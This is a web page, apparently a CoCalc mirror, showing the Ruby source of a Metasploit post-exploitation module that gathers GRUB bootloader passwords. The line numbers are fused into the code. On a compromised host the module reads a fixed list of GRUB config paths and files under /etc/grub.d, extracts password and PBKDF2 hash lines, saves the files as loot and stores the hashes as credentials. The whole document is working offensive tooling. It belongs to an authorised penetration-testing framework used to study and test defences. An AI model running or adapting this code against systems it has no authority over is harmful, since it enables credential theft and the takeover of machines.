CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/gather/grub_creds.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Unix89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Gather GRUB Password',14'Description' => %q{15This module gathers GRUB passwords from GRUB bootloader config files.16},17'License' => MSF_LICENSE,18'Author' => [19'Garvit Dewan <d.garvit[at]gmail.com>', # @dgarvit20'Taeber Rapczak <taeber[at]rapczak.com>',21'Shelby Pace'22],23'Platform' => ['linux', 'osx', 'unix', 'solaris', 'bsd'],24'SessionTypes' => ['meterpreter', 'shell'],25'References' => [ ['URL', 'https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption'] ]26)27)2829register_options(30[31OptString.new(32'FILENAME',33[false, 'Additional grub configuration filename.', '']34),35]36)37end3839def parse_passwd_from_file(file)40return unless readable?(file)4142print_status("Reading #{file}")4344idx = 045contents = read_file(file)46have_pass = false47contents.each_line do |line|48next unless line.start_with?('password')4950have_pass = true51pass_line = line.strip.split(' ')52unless pass_line.length == 353print_status('Unknown Grub password convention. Printing line')54print_status(line)55next56end5758convention = pass_line[0]59case convention60when 'password_pbkdf2'61@creds_hash[pass_line[1]] = pass_line[2]62when 'password'63if pass_line[1].start_with?('--')64@pass_hash[idx] = pass_line[2]65idx += 166else67@creds_hash[pass_line[1]] = pass_line[2]68end69else70print_status('Unknown Grub password convention. Printing line')71print_status(line)72end73end7475if have_pass76file_loc = store_loot('grub.config', 'text/plain', session, contents)77print_good("#{file} saved to #{file_loc}")78end79end8081def run82@creds_hash = Hash.new83@pass_hash = Hash.new8485targets = %w[86/boot/grub/grub.conf87/boot/grub/grub.cfg88/boot/grub/menu.lst89/boot/grub2/grub.cfg90/boot/grub2/user.cfg91/etc/grub.conf92/etc/grub/grub.cfg93/mnt/sysimage/boot/grub.conf94/mnt/boot/grub/grub.conf95/rpool/boot/grub/grub.cfg96]9798targets << datastore['FILENAME'] unless datastore['FILENAME'].empty?99dir('/etc/grub.d').each do |file|100path = '/etc/grub.d/' + file101targets << path if file?(path)102end103104print_status('Searching for GRUB config files..')105targets.each do |target|106parse_passwd_from_file(target)107end108109if @creds_hash.empty? && @pass_hash.empty?110print_bad('No passwords found in GRUB config files')111else112print_good('Found credentials')113114cred_table = Rex::Text::Table.new(115'Header' => 'Grub Credential Table',116'Indent' => 1,117'Columns' => [ 'Username', 'Password' ]118)119120@creds_hash.each do |user, pass|121credential_data = {122origin_type: :session,123post_reference_name: refname,124private_type: :nonreplayable_hash,125private_data: pass,126session_id: session_db_id,127username: user,128workspace_id: myworkspace_id129}130131cred_table << [ user, pass ]132create_credential(credential_data)133end134135@pass_hash.each do |_index, pass|136credential_data = {137origin_type: :session,138post_reference_name: refname,139private_type: :nonreplayable_hash,140private_data: pass,141session_id: session_db_id,142username: '',143workspace_id: myworkspace_id144}145146cred_table << [ '', pass ]147create_credential(credential_data)148end149150print_line151print_line(cred_table.to_s)152end153end154end155156157